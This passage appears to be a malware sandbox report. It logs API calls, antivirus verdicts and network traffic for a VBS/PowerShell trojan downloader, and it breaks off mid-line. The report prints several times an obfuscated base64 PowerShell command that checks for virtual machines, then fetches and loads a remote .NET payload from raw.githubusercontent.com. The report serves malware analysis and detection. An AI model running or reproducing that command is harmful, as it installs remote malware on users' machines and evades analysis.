region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
cmdline powershell -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
filepath: powershell
1 1 0
ESET-NOD32 VBS/TrojanDownloader.Agent.YRA
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
F-Secure Malware.VBS/YAV.Minerva.gixvr
Avira VBS/YAV.Minerva.gixvr
ZoneAlarm HEUR:Trojan-Downloader.Script.Generic
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: |xdS¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
socket: 592
0 0

WSASend

 buffer: 51dS·‚ǘnÞq-Z=üý%DyY'#eª¢'¬ý¶ð  ÿ
socket: 592
0 0
Time & API Arguments Status Return Repeated

WSASend

 buffer: |xdS¥Ë¡š®òHОAú ٍ¾YBBáãm”ƒ/5 ÀÀÀ À 287ÿraw.githubusercontent.com  
socket: 592
0 0

WSASend

 buffer: 51dS·‚ǘnÞq-Z=üý%DyY'#eª¢'¬ý¶ð  ÿ
socket: 592
0 0
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf
parent_process wscript.exe martian_process powershell -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑H